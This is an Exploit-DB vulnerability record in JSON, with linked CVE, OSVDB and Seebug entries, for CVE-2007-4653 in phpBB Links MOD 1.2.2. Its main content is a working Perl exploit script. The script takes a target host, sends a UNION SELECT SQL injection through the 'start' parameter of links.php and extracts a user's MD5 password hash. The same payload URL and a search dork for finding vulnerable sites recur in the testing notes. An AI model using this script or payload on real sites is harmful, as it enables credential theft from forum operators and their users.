{"bulletinFamily": "exploit", "id": "EDB-ID:4346", "cvelist": ["CVE-2007-4653"], "modified": "2007-08-31T00:00:00", "lastseen": "2016-01-31T20:42:41", "edition": 1, "sourceData": "#!/usr/bin/perl\n\nprint q{\n\nphpBB <= 2.0.22 - Links MOD <= v1.2.2 Remote SQL Injection Exploit\n\nBug discovered by Don\nDork: allinurl:links.php?t=search\n or: \"Links MOD v1.2.2 by phpBB2.de\"\nSQL INJECTION: Exploit: links.php?t=search&search_keywords=asd&start=1,1%20UNION%20SELECT%201,username,user_password,4,5,6,7,8,9,10,11,12%20FROM%20phpbb_users%20WHERE%20user_id=2/*\n\n};\n\nuse IO::Socket;\n\nprint q{\n=> Insert URL\n=> without ( http )\n=> };\n$server = <STDIN>;\nchop ($server);\nprint q{\n=> Insert directory\n=> es: /forum/ - /phpBB2/\n=> };\n$dir = <STDIN>;\nchop ($dir);\nprint q{\n=> User ID\n=> Number:\n=> };\n$user = <STDIN>;\nchop ($user);\nif (!$ARGV[2]) {\n}\n$myuser = $ARGV[3];\n$mypass = $ARGV[4];\n$myid = $ARGV[5];\n$server =~ s/(http:\\/\\/)//eg;\n$path = $dir;\n$path .= \"links.php?t=search&search_keywords=asd&start=1,1%20UNION%20SELECT%201,username,user_password,4,5,6,7,8,9,10,11,12%20FROM%20phpbb_users%20WHERE%20user_id=\".$user.\"/*\";\nprint \"\nExploit in process...\\r\\n\";\n$socket = IO::Socket::INET->new(\nProto => \"tcp\",\nPeerAddr => \"$server\",\nPeerPort => \"80\") || die \"Exploit failed\";\nprint \"Exploit\\r\\n\";\nprint \"in process...\\r\\n\";\nprint $socket \"GET $path HTTP/1.1\\r\\n\";\nprint $socket \"Host: $server\\r\\n\";\nprint $socket \"Accept: */*\\r\\n\";\nprint $socket \"Connection: close\\r\\n\\r\\n\";\nprint \"Exploit finished!\\r\\n\\r\\n\";\nwhile ($answer = <$socket>)\n{\nif ($answer =~/(\\w{32})/)\n{\nif ($1 ne 0) {\nprint \"MD5-Hash is: \".$1.\"\\r\\n\";\n}\nexit();\n}\n}\n\n# milw0rm.com [2007-08-31]\n", "published": "2007-08-31T00:00:00", "href": "https://www.exploit-db.com/exploits/4346/", "osvdbidlist": ["38427"], "reporter": "Don", "hash": "560f75068326588c7ae9cdda5a9440ac28fb5cadc949ab6240d5281ee8987c59", "title": "phpBB Links MOD 1.2.2 - Remote SQL Injection Exploit", "history": [], "type": "exploitdb", "objectVersion": "1.0", "description": "phpBB Links MOD 1.2.2 Remote SQL Injection Exploit. CVE-2007-4653. Webapps exploit for php platform", "references": [], "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/4346/"}

{"result": {"cve": [{"id": "CVE-2007-4653", "type": "cve", "title": "CVE-2007-4653", "description": "SQL injection vulnerability in links.php in the Links MOD 1.2.2 and earlier for phpBB 2.0.22 and earlier allows remote attackers to execute arbitrary SQL commands via the start parameter in a search action.", "published": "2007-09-04T18:17:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-4653", "cvelist": ["CVE-2007-4653"], "lastseen": "2016-09-03T09:26:19"}], "osvdb": [{"id": "OSVDB:38427", "type": "osvdb", "title": "Links MOD for phpBB links.php search Action start Variable SQL Injection", "description": "## Manual Testing Notes\nlinks.php?t=search&search_keywords=asd&start=1,1%20UNION%20SELECT%201,username,user_password,4,5,6,7,8,9,10,11,12%20FROM%20phpbb_users%20WHERE%20user_id=2/*\n## References:\nGeneric Exploit URL: http://www.milw0rm.com/exploits/4346\n[CVE-2007-4653](https://vulners.com/cve/CVE-2007-4653)\nBugtraq ID: 25501\n", "published": "2007-08-31T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://vulners.com/osvdb/OSVDB:38427", "cvelist": ["CVE-2007-4653"], "lastseen": "2017-04-28T13:20:34"}], "seebug": [{"id": "SSV-64867", "type": "seebug", "title": "phpBB Links MOD 1.2.2 - Remote SQL Injection Exploit", "description": "Summary: \nphpBB 2.0.22, the Links MOD 1.2.2 and earlier versions of links. in php there is a SQL injection vulnerability. A remote attacker can use a search operation in the start parameter, to execute arbitrary SQL commands.\n", "published": "2014-07-01T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.seebug.org/vuldb/ssvid-64867", "cvelist": ["CVE-2007-4653"], "lastseen": "2016-07-28T06:38:15"}]}}